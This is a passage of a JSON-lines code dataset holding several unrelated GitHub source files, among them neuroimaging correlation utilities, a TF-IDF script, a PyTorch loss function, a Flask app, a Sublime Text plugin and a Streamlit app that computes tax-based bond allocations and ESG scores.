regional correlation.\n\n If an atlas is supplied, will return a data frame as follows:\n \n summary: boolean\n If True, return only the regional labels with correlations\n If False, return entire dataframe \n '''\n if mask != None:\n masked = do_mask(images=images,mask=mask)\n\n # No mask means we include all voxels, including outside brain\n else:\n masked = np.vstack((np.array(images[0].get_data().flatten()),\n np.array(images[1].get_data().flatten())))\n\n # A return value of \"nan\" indicates that there was not overlap\n if np.isnan(masked).all():\n corr = np.nan\n\n else:\n # If we want a whole brain correlation score, (no atlas specified)\n if atlas == None:\n corr = calculate_pairwise_correlation(masked[0],\n masked[1],\n corr_type=corr_type)\n\n else: \n atlas_nii = nibabel.load(atlas.file)\n\n if not (atlas_nii.get_affine() == images[0].get_affine()).all(): \n atlas_nii, _ = resample_images_ref(images=atlas.file,\n reference=images[0],\n interpolation=\"nearest\")\n\n atlas_vector = do_mask(atlas_nii,mask=mask)[0]\n atlas_labels = ['\"%s\"' %(atlas.labels[str(int(x))].label) \n for x in atlas_vector]\n atlas_colors = ['\"%s\"' %(atlas.color_lookup[x.replace('\"',\"\")]) \n for x in atlas_labels]\n\n # Need to check here if we have overlap!\n\n if not np.isnan(atlas_vector).all():\n corr = calculate_atlas_correlation(image_vector1=masked[0],\n image_vector2=masked[1],\n atlas_vector=atlas_vector,\n atlas_labels=atlas_labels,\n atlas_colors=atlas_colors,\n corr_type=corr_type,\n summary=summary)\n else:\n corr = np.nan\n\n return corr\n\ndef calculate_pairwise_correlation(image_vector1,\n image_vector2,\n corr_type=\"pearson\",\n atlas_vector=None): \n\n '''calculate_pairwise_correlation\n Calculate a correlation value for two vectors\n \n image_vector1,image_vector2: vectors of equal length with image values\n \n corr_type: \n correlation type [default pearson]\n \n atlas_vector: \n single vector of region labels strings [optional]\n\n If an atlas_vector is supplied, returns dictionary with atlas labels\n 
If not, returns single correlation value\n '''\n\n correlations = dict()\n\n # If we have atlas labels, return vector with labels\n if atlas_vector is not None:\n labs = np.unique(atlas_vector)\n for l in labs:\n if corr_type == \"spearman\": \n corr,pval = spearmanr(image_vector1[np.where(atlas_vector == l)[0]],\n image_vector2[np.where(atlas_vector == l)[0]])\n correlations[str(int(l))] = corr\n elif corr_type == \"pearson\": \n corr,pval = pearsonr(image_vector1[np.where(atlas_vector == l)[0]],\n image_vector2[np.where(atlas_vector == l)[0]]) \n correlations[str(int(l))] = corr\n\n else:\n if corr_type == \"pearson\": \n corr,pval = pearsonr(image_vector1, image_vector2)\n correlations = corr\n elif corr_type == \"spearman\": \n corr,pval = spearmanr(image_vector1, image_vector2)\n correlations = corr \n return correlations\n\ndef calculate_atlas_correlation(image_vector1,\n image_vector2,\n atlas_vector,\n atlas_labels,\n atlas_colors,\n corr_type=\"pearson\",\n summary=False):\n\n '''calculate_atlas_correlation\n Return regional correlations from an atlas object:\n\n image_vector1,image_vector2: \n vectors of equal length with image values\n \n atlas_vector: \n vector of atlas labels same length as image vector\n \n corr_type: str\n pearson or spearman\n \n summary: boolean\n If True, return only the regional labels with correlations\n If False, return entire dataframe \n\n if summary == False (default):\n\n INPUT_DATA_1, INPUT_DATA_2: the values in the images\n ATLAS_DATA: the value (integer) in the atlas, used to match to name labels\n ATLAS_LABELS: region names extracted from the atlas.xml\n ATLAS_CORR: the regional correlation for some point in input data 1 or 2\n ATLAS_COLOR: a hex value to render in the final d3\n\n If summary == True\n returns only region labels and corresponding correlations\n '''\n\n df = pandas.DataFrame()\n df[\"INPUT_DATA_ONE\"] = image_vector1\n df[\"INPUT_DATA_TWO\"] = image_vector2\n df[\"ATLAS_DATA\"] = atlas_vector \n df[\"ATLAS_LABELS\"] = atlas_labels \n \n corrs = calculate_pairwise_correlation(image_vector1,image_vector2,\n atlas_vector=atlas_vector,\n corr_type=corr_type)\n\n df[\"ATLAS_CORR\"] = [corrs[str(int(x))] for x in atlas_vector]\n df[\"ATLAS_COLORS\"] = atlas_colors \n \n if summary == False: \n return df\n else:\n regional = df.copy()\n regional = regional.loc[:,regional.columns[3:5]]\n regional = regional.drop_duplicates()\n return regional\n \n\ndef do_multi_correlation(image_df,corr_type=\"pearson\"):\n '''comparison for an entire pandas data frame'''\n return image_df.corr(method=corr_type, min_periods=1)\n\n\ndef calc_rows_columns(ratio, n_images):\n '''from chrisfilo https://github.com/chrisfilo/mriqc'''\n rows = 1\n for _ in range(100):\n columns = math.floor(ratio * rows)\n total = rows * columns\n if total > n_images:\n break\n\n columns = math.ceil(ratio * rows)\n total = rows * columns\n if total > n_images:\n break\n rows += 1\n return rows, columns\n\ndef TtoZ(t_stat_map,output_nii,dof):\n '''TtoZ: \n for details see\n https://github.com/vsoch/TtoZ\n Also provided for command line.\n\n t_stat_map: \n file path to t stat image\n\n output_nii: \n output nifti file\n \n dof: \n degrees of freedom (typically number subjects - 2)\n\n '''\n print(\"Converting map %s to Z-Scores...\" %(t_stat_map))\n \n mr = nibabel.load(t_stat_map)\n data = mr.get_data()\n\n # Select just the nonzero voxels\n nonzero = data[data!=0]\n\n # We will store our results here\n Z = np.zeros(len(nonzero))\n\n # Select values less than or == 0, and 
greater than zero\n c = np.zeros(len(nonzero))\n k1 = (nonzero <= c)\n k2 = (nonzero > c)\n\n # Subset the data into two sets\n t1 = nonzero[k1]\n t2 = nonzero[k2]\n\n # Calculate p values for <=0\n p_values_t1 = t.cdf(t1, df = dof)\n z_values_t1 = norm.ppf(p_values_t1)\n\n # Calculate p values for > 0\n p_values_t2 = t.cdf(-t2, df = dof)\n z_values_t2 = -norm.ppf(p_values_t2)\n Z[k1] = z_values_t1\n Z[k2] = z_values_t2\n\n # Write new image to file\n empty_nii = np.zeros(mr.shape)\n empty_nii[mr.get_data()!=0] = Z\n Z_nii_fixed = nibabel.nifti1.Nifti1Image(empty_nii,\n affine=mr.get_affine(),\n header=mr.get_header())\n nibabel.save(Z_nii_fixed,output_nii)\n\n# From Chrisfilo alleninf\n\ndef nifti_file(string):\n if not os.path.exists(string):\n msg = \"%r does not exist\" % string\n raise argparse.ArgumentTypeError(msg)\n try:\n nii = nibabel.load(string)\n except IOError as e:\n raise argparse.ArgumentTypeError(str(e))\n except:\n msg = \"%r is not a nifti file\" % string\n raise argparse.ArgumentTypeError(msg)\n else:\n if len(nii.shape) == 4 and nii.shape[3] > 1:\n msg = \"%r is four dimensional\" % string\n raise argparse.ArgumentTypeError(msg)\n return string\n","repo_name":"vsoch/pybraincompare","sub_path":"pybraincompare/compare/maths.py","file_name":"maths.py","file_ext":"py","file_size_in_byte":9867,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"54"} +{"seq_id":"8585139017","text":"from functions import *\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.decomposition import TruncatedSVD\nimport json\n\nquery = 'Widerrufsrecht bei Haustürgeschäften'\n\nwith open('articles_preprocessed.json') as json_file:\n docs = json.load(json_file)\n\n# TF-IDF-Matrix Dokumente\nvectorizer = TfidfVectorizer(sublinear_tf=True)\ntfidf_docs = vectorizer.fit_transform(docs.values())\nvocab = vectorizer.vocabulary_\n# svd = TruncatedSVD(n_components=100, n_iter=7, random_state=42)\n# svd.fit(tfidf_docs)\n# tfidf_docs_svd = svd.transform(tfidf_docs)\n\n# TF-IDF-Vektor Abfrage\npreprocessed_query = get_preprocessed_text(query)\ndict_query = {'query': preprocessed_query}\nvectorizer = TfidfVectorizer(vocabulary=vocab, sublinear_tf=True)\ntfidf_query = vectorizer.fit_transform(dict_query.values())\n# tfidf_query_svd = svd.transform(tfidf_query)\n\ncos_sim = cosine_similarity(tfidf_query, tfidf_docs)\nprint('TF-IDF: Kosinus-Ähnlichkeit zwischen Abfrage und Dokumenten')\nprint(cos_sim)\n\n# cos_sim_pca = cosine_similarity(tfidf_query_svd, tfidf_docs_svd)\n# print('TF-IDF: Kosinus-Ähnlichkeit zwischen Abfrage und Dokumenten (SVD)')\n# print(cos_sim_pca)","repo_name":"baltisberger/gyminf-projekt","sub_path":"evaluation_test.py","file_name":"evaluation_test.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18857721778","text":"\nimport torch\n\n### loss function =============================================================\ndef loss_fn(x_target, x_prediction, z_mu, z_logvar, z_prior_mu, z_prior_logvar, d_t, d_mu, d_cov):\n\n ### MSE loss --------------------------------------------------------------\n sigma_mse = 1.0\n mse_loss_t = 1.0 / sigma_mse**2 * torch.mean(torch.square(x_target - x_prediction))\n\n ### KL divergence loss z --------------------------------------------------\n klz_element = z_prior_logvar - z_logvar - 1. 
+ (z_logvar.exp() + (z_mu - z_prior_mu).pow(2)) / (z_prior_logvar.exp()+1e-6)\n klz_loss_t = 0.5 * torch.mean(klz_element)\n\n ### smoothness loss -------------------------------------------------------\n dif_x = diff_fun(d_t, 2)\n dif_y = diff_fun(d_t, 3)\n\n n_dim = torch.Tensor.dim(d_t)\n dif_x_mean = torch.mean(dif_x, dim=[*range(1, n_dim)])\n dif_y_mean = torch.mean(dif_y, dim=[*range(1, n_dim)])\n smooth_loss_t = (torch.mean(dif_x_mean) + torch.mean(dif_y_mean)) / 2.\n\n ### KL divergence loss d --------------------------------------------------\n det_d_cov = d_cov[:,:,:,0,0]*d_cov[:,:,:,1,1] - d_cov[:,:,:,0,1]*d_cov[:,:,:,1,0]\n d_mu_expand = d_mu.permute(0,2,3,1).unsqueeze(-1)\n\n kld_element_1 = -torch.log(det_d_cov)\n kld_element_2 = d_cov[:,:,:,0,0] + d_cov[:,:,:,1,1]\n kld_element_3 = torch.matmul(d_mu_expand.permute(0,1,2,4,3), d_mu_expand).squeeze(-1).squeeze(-1)\n\n kld_element = kld_element_1 - 2.0 + kld_element_2 + kld_element_3\n kld_loss_t = 0.5 * torch.mean(kld_element)\n\n return mse_loss_t, klz_loss_t, smooth_loss_t, kld_loss_t\n\ndef diff_fun(y_in, k_dim):\n n_dim = torch.Tensor.dim(y_in)\n\n rp = [k_dim, *range(k_dim), *range(k_dim + 1, n_dim)]\n y = y_in.permute(rp)\n\n df = y[1:, ...] - y[:-1, ...]\n\n rn = [*range(1, k_dim+1), 0, *range(k_dim+1, n_dim)]\n df = df.permute(rn) # permute back\n\n df = df.pow(2)\n return df","repo_name":"alireza-hokmabadi/DragNet","sub_path":"utils/loss_function.py","file_name":"loss_function.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"33962790141","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom pymongo import MongoClient\nfrom bson.objectid import ObjectId\nimport markov_2nd_order, frequency\nimport os \n\napp = Flask(__name__)\n\nhost = os.environ.get('MONGODB_URI', 'mongodb://localhost:27017/create-lryic-gen')\nclient = MongoClient(host=f'{host}?retryWrites=false')\ndb = client.get_default_database()\nlyric = db['lyric']\n\n\n@app.route('/')\ndef index():\n \"\"\"Return homepage\"\"\"\n lyric_list = {\n 'lyric' : markov_2nd_order.run_generator()\n }\n lyric_id = lyric.insert_one(lyric_list).inserted_id\n lyric_text = lyric.find_one({'_id': ObjectId(lyric_id)})['lyric'] \n return render_template('base.html', lyric_id = lyric_id, lyric_text = lyric_text)\n\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=os.environ.get('PORT', 5000))","repo_name":"ysawiris/CS-1.2-Intro-Data-Structures","sub_path":"tweet_generator/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"33156161290","text":"# https://leetcode.com/problems/combinations/\n# Backtracking\n\nfrom typing import List\n\n\nclass Solution:\n\n def combine(self, n: int, k: int) -> List[List[int]]:\n tmp = []\n\n def _recursive(curr_idx: int, answer: List[int]):\n nonlocal k, tmp, n\n if len(tmp) == k:\n answer.append(tmp[:])\n return\n\n for x in range(curr_idx, n + 1):\n tmp.append(x)\n _recursive(x + 1, answer)\n tmp.pop()\n\n answer = []\n _recursive(1, answer)\n return answer\n","repo_name":"jyeoniii/algorithm","sub_path":"20201122/combinations.py","file_name":"combinations.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1223991748","text":"from .EntityEdge import 
EntityEdge\n\n# Abstract class representing entities governing data in the graph\nclass EntityNode:\n def __init__(self, name, dggraph):\n # Name, graph, and vertex instantiation\n self.name = name\n self.dggraph = dggraph\n self.other_entity = set()\n self.other_entity_edges = set()\n self.vertex = self.dggraph.add_node(self)\n\n def connect(self, other_ent, props):\n if other_ent in self.other_entity:\n raise Exception(\"Duplicate edge.\")\n \n edge = EntityEdge(self.vertex, other_ent.vertex, props, self.dggraph)\n self.other_entity.add(other_ent)\n self.other_entity_edges.add(edge)\n other_ent.other_entity.add(self)\n other_ent.other_entity.add(edge)","repo_name":"toogiii/TermsForTerms","sub_path":"TermsForTerms/src/termsforterms/EntityNode.py","file_name":"EntityNode.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2963515282","text":"import os\nimport sys\nimport sublime\nimport sublime_plugin\nimport re\nimport json\nfrom xml.dom.minidom import parseString\nfrom xml.parsers.expat import ExpatError, errors\nfrom os.path import basename, splitext\n\nsqattop = 1;\n\nclass sqopenincludeCommand(sublime_plugin.WindowCommand):\n\n\tdef run(self):\n\t\tprint(\"openInclude\");\n\t\tview = self.window.active_view()\n\t\tword = view.line(view.sel()[0])\n\t\twordtext = view.substr(word)\n\t\tprint(wordtext)\n\nclass sqformatcodeCommand(sublime_plugin.TextCommand):\n\n\tdef __init__(self,view):\n\t\t self.view=view;\n\t\t self.language=self.get_language()\n\n\tdef get_language(self):\n\t\tsyntax = self.view.settings().get('syntax')\n\t\tlanguage = splitext(basename(syntax))[0].lower() if syntax is not None else \"plain text\"\n\t\treturn language\n\n\tdef get_text_type(self):\n\t\tlanguage = self.language;\n\t\t#print(language);\n\t\tif language == 'xml':\n\t\t\treturn 'xml'\n\t\tif language == 'json':\n\t\t\treturn 'json'\n\t\tif language == 'php':\n\t\t \treturn 'php'\n\t\tif language == 'c++':\n\t\t \treturn 'c++'\n\t\tif language == 'c':\n\t\t \treturn 'c++'\n\t\tif language == \"merlin\":\n\t\t\treturn \"merlin\"\n\t\tif language == 'plain text' and s:\n\t\t\tif s[0] == '<':\n\t\t\t\treturn 'xml'\n\t\t\t\tif s[0] == '{' or s[0] == '[':\n\t\t\t\t\treturn 'json'\n\t\treturn 'notsupported'\n\n\tdef run(self,edit):\n\t\ttext_type = self.get_text_type();\n\t\t#print(text_type);\n\t\tif (text_type == 'php') :\n\t\t\tprint('phpfmt')\n\t\t\tself.view.run_command(\"fmt_now\")\n\t\tif (text_type == 'c++') :\n\t\t\tprint('astyleformat');\n\t\t\tself.view.run_command(\"astyleformat\")\n\t\tif (text_type == 'json') :\n\t\t\tprint('IndentXML')\n\t\t\tself.view.run_command(\"auto_indent\")\n\t\t\tself.view.run_command(\"json_comma\")\n\t\t\tself.view.run_command(\"pretty_json\")\n\t\tif (text_type == 'xml') :\n\t\t\tprint('IndentXML')\n\t\t\tself.view.run_command(\"auto_indent\")\n\t\tif (text_type == 'merlin') :\n\t\t\tprint('syn: merlin')\n\t\t\tself.view.run_command(\"sqmerlin\")\n\nclass sqfindCommand(sublime_plugin.WindowCommand):\n\n\tdef run(self):\n\t\tglobal sqattop;\n\t\tif (sqattop != 0 ) :\n\t\t\tsqattop=0;\n\t\t\tself.window.run_command(\"show_panel\", {\"panel\": \"find\", \"reverse\": False});\n\t\telse:\n\t\t\tself.window.run_command(\"hide_panel\", {\"panel\": \"find\", \"reverse\": False});\n\t\t\tself.window.run_command(\"find_next\");\n\t\t\tsqattop=0;\n\nclass sqconsoleCommand(sublime_plugin.WindowCommand):\n\n\tdef run(self):\n\t\tself.window.run_command(\"show_panel\", 
{\"panel\": \"console\", \"toggle\": True});\n\nclass sqbeginCommand(sublime_plugin.TextCommand):\n\n\tdef run(self, edit):\n\t\tglobal sqattop;\n\t\tself.view.run_command(\"move_to\", {\"to\": \"bof\", \"extend\": False});\n\t\tsqattop=1;\n\nclass sqselectCommand(sublime_plugin.WindowCommand):\n\n\tdef run(self):\n\t\tglobal sqattop;\n\t\twindow=self.window;\n\t\tview=window.active_view();\n\t\tsel=view.sel();\n\t\tregion=sel[0];\n\t\tsz=region.size();\n\t\tif (sz>0) :\n\t\t view.run_command(\"expand_selection\", {\"to\": \"line\"})\n\t\telse:\n\t\t view.run_command(\"move\", {\"by\": \"pages\", \"forward\": True});\n\t\nclass sqcloseotherCommand(sublime_plugin.WindowCommand):\n def run(self):\n \tself.run_command(\"toggle_side_bar\");","repo_name":"marketideas/sublime_sq","sub_path":"sublime_sq.py","file_name":"sublime_sq.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11126061973","text":"# s=121\n# r=str(s)\n# for i in len(s):\n# for j in \n# if r[i] int:\n M = len(grid)\n N = len(grid[0])\n \n seen = set()\n \n queue = collections.deque()\n queue.append([0,0,0])\n count = 0\n \n while queue:\n # print(count,queue)\n for q in range(len(queue)):\n x,y,k = queue.popleft()\n \n if x == M-1 and y == N-1:\n print(k)\n return count \n \n if (x,y,k) in seen:\n continue\n \n seen.add((x,y,k))\n \n for m,n in (x+1,y),(x,y+1),(x-1,y),(x,y-1):\n if 0<=m 4: # k = 4\r\n for i in clusters:\r\n if data[0][0] in i and data[0][1] not in i:\r\n for j in clusters:\r\n if data[0][1] in j:\r\n i += j\r\n clusters.remove(j)\r\n break\r\n break\r\n elif data[0][1] in i and data[0][0] not in i:\r\n for j in clusters:\r\n if data[0][0] in j:\r\n i += j\r\n clusters.remove(j)\r\n break\r\n break\r\n data.pop(0)\r\n \r\nprint(clusters)\r\n\r\nflag = False\r\nfor i in range(len(data)):\r\n for j in clusters:\r\n if (data[i][0] in j and data[i][1] not in j) or (data[i][1] in j and data[i][0] not in j):\r\n print(data[i][2])\r\n flag = True\r\n break\r\n if flag:\r\n break\r\n ","repo_name":"shivamzaz/Python_Practice","sub_path":"2_1.py","file_name":"2_1.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4978766314","text":"################################################################################\r\n# Step 1 - Financial tax information:\r\n# Import personal tax information from 'financial_information.py' (or whatever the file is called) script into the file \"investor_portfolio\"\r\n# which contains code for Investor Portfolio's customer interface in order to add wallet operations to the\r\n# application. We will provide the investors account information to the application.\r\n\r\n# Step 2 - Crypto wallet:\r\n# Within the Streamlit sidebar section of code, create a variable named `account`. Set this variable equal to a call on the `generate_account`\r\n# function. This function will create the Investor Portfolio customer's account and will contain their wallet information. 
Additionally within\r\n# this section, there will be an `st.sidebar.write` function that will display the balance of the customer’s account.\r\n\r\n################################################################################\r\n# Imports\r\nimport hvplot.pandas\r\nimport matplotlib as plt\r\nimport pandas_datareader as pdr\r\nimport alpaca_trade_api as alpaca\r\nfrom dotenv import load_dotenv\r\nimport requests\r\nimport json\r\nimport urllib.request\r\nimport calendar\r\nimport yesg\r\nimport streamlit as st\r\nfrom dataclasses import dataclass\r\nimport plotly.figure_factory as ff\r\nfrom datetime import datetime\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom typing import Any, List\r\nimport pandas as pd\r\nimport urllib.request\r\nimport plotly.express as px\r\nmunis = pd.read_csv('municipal_bonds.csv')\r\ntreas = pd.read_csv('treasury_bonds.csv')\r\n\r\n\r\n\r\n# Importing the functions for other .py files\r\n#from crypto_wallet_information import generate_crypto_account, get_balance\r\n#from tax import investor_tax_rate\r\n\r\nst.title(\"Investor Portfolio\")\r\nst.markdown(\"### Financial areas recommended to invest in based on your financial background.\")\r\nst.sidebar.write('Welcome!')\r\nst.sidebar.image(\"Images/stock_image_pixabay.jpg\")\r\n\r\n# Creating the drop down menu options located on the sidebar. If/else will used to choose either \"Tax Portfolio\", \"Sentiment Analysis Model\" or \"Twitter Sentiment Analysis\".\r\n\r\ndrop_down = [\"Tax Portfolio\", \"Sentiment Analysis Model\", \"Twitter Sentiment Analysis\"]\r\noptions = st.sidebar.selectbox(\"Select from the following options:\", drop_down)\r\n\r\n# Creating the interactive buttons for name, age, and income\r\n\r\nif options == 'Tax Portfolio':\r\n st.sidebar.success(\"2021 Tax Portfolio Summary\")\r\n st.write('Here is a brief summary of your 2021 Tax Portfolio.')\r\n\r\n investor_input = st.text_input(\"Enter your name:\", \" \")\r\n if(st.button('Submit')):\r\n result = investor_input.title()\r\n st.success(result)\r\n\r\n age_response= st.number_input(\"Enter your age:\" , 0 , 100)\r\n if(st.button('Submit', key = 0)):\r\n result_age = age_response\r\n st.success(result_age)\r\n\r\n income_response = st.number_input(\"Enter your annual income (if married, please respond the joint annual income):\", 0, 10000000)\r\n if(st.button('Submit', key = 1)):\r\n result_income = income_response\r\n st.success(result_income)\r\n\r\n if not investor_input:\r\n pass\r\n\r\n# Creating the drop down menu options if 'Tax Portfolio' is selected. 
If/else will used to choose either 'Breakdown of Portfolio' or 'Portfolio Plot'.\r\n\r\n else:\r\n st.markdown('Select from the drop down menu:')\r\n selected_options = st.selectbox(\"\", options=['Select an option','Breakdown of Portfolio', 'Portfolio Plot'], index=0)\r\n if selected_options == 'Breakdown of Portfolio':\r\n st.write('Information of the investor will be displayed here!')\r\n\r\n### *** FROM tax.ipynb *** Calculating tax-yield and annual return for the portfolio ###\r\n\r\n if income_response >= 0 and income_response <= 10275:\r\n tax_rate = .10\r\n elif income_response >= 10275 and income_response < 41775:\r\n tax_rate = .12\r\n elif income_response >= 41775 and income_response < 89075:\r\n tax_rate = .22\r\n elif income_response >= 89075 and income_response < 170050:\r\n tax_rate = .24\r\n elif income_response >= 170050 and income_response < 215950:\r\n tax_rate = .32\r\n elif income_response >= 215950 and income_response < 539900:\r\n tax_rate = .35\r\n elif income_response >= 539900:\r\n tax_rate = .37\r\n\r\n st.write(\"Here is your tax rate:\", tax_rate)\r\n\r\n treas_tax_equivalet_yield = (munis['Coupon']) / (1-tax_rate)\r\n munis_vs_treas = pd.DataFrame(treas_tax_equivalet_yield)\r\n munis_vs_treas = pd.DataFrame(munis[['Issuer Name', 'CUSIP', 'Coupon']])\r\n\r\n munis_vs_treas['treasury_equivalet_yield'] = treas_tax_equivalet_yield\r\n st.write(\"Here is a DataFrame created based on your tax rate to calculate your tax-equivalent yield:\", munis_vs_treas)\r\n\r\n\r\n # Getting the treas_weight and muni_weight from the tax_rate\r\n\r\n treas_weight = 0\r\n muni_weight = 0\r\n\r\n if tax_rate == .10 or tax_rate == .12:\r\n treas_weight = .100\r\n muni_weight = 0\r\n if tax_rate == .22 or tax_rate == .24 or tax_rate == .32:\r\n treas_weight = .50\r\n muni_weight = .50\r\n if tax_rate == .35 or tax_rate == .37:\r\n treas_weight = 0\r\n muni_weight = .100\r\n\r\n st.write(\"The portfolio weight for treasury bonds should be\",\r\n treas_weight * 100, \"% since your income tax rate is:\", tax_rate)\r\n st.write(\"The portfolio weight for municipal bonds should be\",\r\n muni_weight * 100, \"% since your income tax rate is:\", tax_rate)\r\n\r\n\r\n # Getting the equity_allocation, fixed_income_allocation and fixed_return\r\n\r\n equity_allocation = 100 - age_response\r\n st.write(\"Equity allocation:\", equity_allocation)\r\n\r\n fixed_allocation = 100 - equity_allocation\r\n st.write(\"Fixed income allocation:\", fixed_allocation)\r\n\r\n treas_yield_chosen = np.mean(munis_vs_treas['treasury_equivalet_yield'])\r\n muni_yield_chosen = np.mean(munis_vs_treas['Coupon'])\r\n\r\n fixed_allocation_return = (\r\n treas_weight * treas_yield_chosen) + (muni_weight * muni_yield_chosen)\r\n st.write(\"Fixed return:\", fixed_allocation_return)\r\n\r\n equity_annual_return = .27\r\n\r\n # Getting the annual_return\r\n\r\n portfolio_annual_return = (equity_allocation / 100) * equity_annual_return + (\r\n fixed_allocation/100) * ((fixed_allocation_return * 2)/100)\r\n st.write(\"Your annual portfolio return is:\",\r\n portfolio_annual_return)\r\n\r\n### *** FROM tax.ipynb *** Calculating tax-yield and annual return for the portfolio ###\r\n\r\n elif selected_options == 'Portfolio Plot':\r\n # Sample data from https://docs.streamlit.io/library/api-reference/charts/st.plotly_chart\r\n \r\n equity_allocation = 100 - age_response\r\n fixed_allocation = 100 - equity_allocation\r\n equity_annual_return = .27\r\n\r\n # Add allocation data\r\n x1 = equity_allocation\r\n x2 = fixed_allocation\r\n 
\r\n # Group data together\r\n pie_data = [x1, x2]\r\n group_labels = ['Equity Allocation','Fixed Allocation']\r\n\r\n # Pie Chart Plot of test Tickers\r\n pie_chart = px.pie( values=pie_data, names=group_labels, title='Pie Chart of Allocations')\r\n st.plotly_chart(pie_chart, use_container_width=True)\r\n\r\n\r\n\r\nelif options == 'Sentiment Analysis Model':\r\n st.sidebar.success(\"Trending Stocks or Coins\")\r\n st.write('Here is a fundamental analysis for the following selected stock or coin.')\r\n #investor_input = ''\r\n \r\n st.markdown('Type in the ** Ticker Symbol ** for the given ** Stock** or ** Coin **')\r\n investor_input = st.text_input('') \r\n if(st.button('Submit', key=4)):\r\n result_ticker_symbol = investor_input\r\n st.success(result_ticker_symbol)\r\n \r\n if not investor_input:\r\n pass\r\n else: \r\n st.markdown('Select from the drop down menu if the ticker symbol is a stock or coin:') \r\n selected_options = st.selectbox(\"\", options = ['Select an option','Stock', 'Crypto'], index=0)\r\n if selected_options == 'Stock':\r\n st.markdown('Displayed **Stock** Information')\r\n st.write('Select a ** timeframe ** for the selected ** stock ** to get a fundamental analysis breakdown.')\r\n st.markdown('Select a Start Date:')\r\n start_date = st.date_input(\"\", datetime(2020, 1, 1))\r\n st.write('Selected date:', start_date)\r\n\r\n\r\n### *** FROM ESG_DATA.ipynb *** Downloads historic ESG ratings and returns it as a dataframe (7 years) ###\r\n\r\n sp_500 = pd.read_csv('sandp500.csv')\r\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) '\r\n 'Chrome/50.0.2661.102 Safari/537.36'}\r\n\r\n response = requests.get('https://query2.finance.yahoo.com/v1/finance/esgChart', params={\"symbol\": investor_input},\r\n headers=headers)\r\n\r\n try:\r\n df = pd.DataFrame(\r\n response.json()[\"esgChart\"][\"result\"][0][\"symbolSeries\"])\r\n df[\"Date\"] = pd.to_datetime(df[\"timestamp\"], unit=\"s\")\r\n\r\n df = df.rename(columns={\"esgScore\": \"Total-Score\", \"environmentScore\": \"E-Score\", \"socialScore\": \"S-Score\",\r\n \"governanceScore\": \"G-Score\"})\r\n df[\"Ticker\"] = investor_input\r\n \r\n st.write('DataFrame for Total Score and ESG Scores from the past 7 years:', investor_input)\r\n st.write(df[['Date', 'Total-Score', 'E-Score', 'S-Score', 'G-Score', 'Ticker']].set_index('Date'))\r\n\r\n except:\r\n st.write('An error has occurred. 
The ticker symbol might be wrong or you might need to wait to continue.')\r\n\r\n \r\n\r\n### *** FROM ESG_DATA.ipynb *** Downloads historic ESG ratings and returns it as a dataframe (7 years) ###\r\n\r\n\r\n### *** FROM portfolio analysis v2.ipynb *** Gives the portfolio annual return, portfolio annual SD, portfolio sharpe ratio, total ESG score ###\r\n\r\n st.write('Insert test or using Twitter Sentiment DataFrame:')\r\n \r\n test = [['JPM', 50], ['SBAC', 12], ['GOOGL', 39], ['TSLA', 100], ['GPN', 22]]\r\n df_test = pd.DataFrame(test, columns=['Ticker', 'Sentiment'])\r\n #st.write(df_test)\r\n\r\n # Insert test or twitter sentiment dataframe\r\n df_portfolio = df_test[['Ticker', 'Sentiment']]\r\n df_portfolio = df_portfolio.sort_values(by=['Sentiment'], ascending=False)\r\n df_portfolio = df_portfolio.reset_index()\r\n df_portfolio = df_portfolio.drop(['index'], axis=1)\r\n\r\n # Calculate the total number of sentiments\r\n sentiment_sum = df_portfolio['Sentiment'].sum()\r\n st.write('Total number of Sentiments:', sentiment_sum)\r\n\r\n # Calculate the weights for each ticker\r\n df_portfolio['weights'] = df_portfolio['Sentiment']/sentiment_sum\r\n\r\n\r\n # Pie Chart Plot of test Tickers\r\n pie_chart = px.pie(data_frame=df_portfolio, values= 'weights', names='Ticker', title='Pie Chart of Sentiments')\r\n st.plotly_chart(pie_chart, use_container_width=True)\r\n\r\n # Naming tickers\r\n df_portfolio['weights'].sum()\r\n\r\n ticker_0 = df_portfolio.loc[0, 'Ticker']\r\n ticker_1 = df_portfolio.loc[1, 'Ticker']\r\n ticker_2 = df_portfolio.loc[2, 'Ticker']\r\n ticker_3 = df_portfolio.loc[3, 'Ticker']\r\n ticker_4 = df_portfolio.loc[4, 'Ticker']\r\n\r\n #Set start and end date for the API calls\r\n start_date = pd.Timestamp('2010-08-01', tz='America/New_York').isoformat()\r\n end_date = pd.Timestamp('2021-11-23', tz='America/New_York').isoformat()\r\n\r\n # INDEX 0: Make API call and populate dataframe with Close, and Daily Return info\r\n df_0 = pdr.DataReader(ticker_0, 'yahoo', start_date, end_date)\r\n df_0 = df_0['Close']\r\n df_0 = pd.DataFrame(df_0)\r\n df_0['Daily Return'] = df_0['Close'].pct_change()\r\n df_0 = df_0.dropna()\r\n\r\n #INDEX 0: Calculate annual return, annual standard deviation and Sharpe Ratio\r\n\r\n # META NOTE: Because Facebook changed their name, the ticker META doesn't have\r\n #the same amount of historical data\r\n\r\n df_0['Annual Return'] = df_0['Daily Return'].rolling(window=252).mean()\r\n df_0['Annual SD'] = df_0['Daily 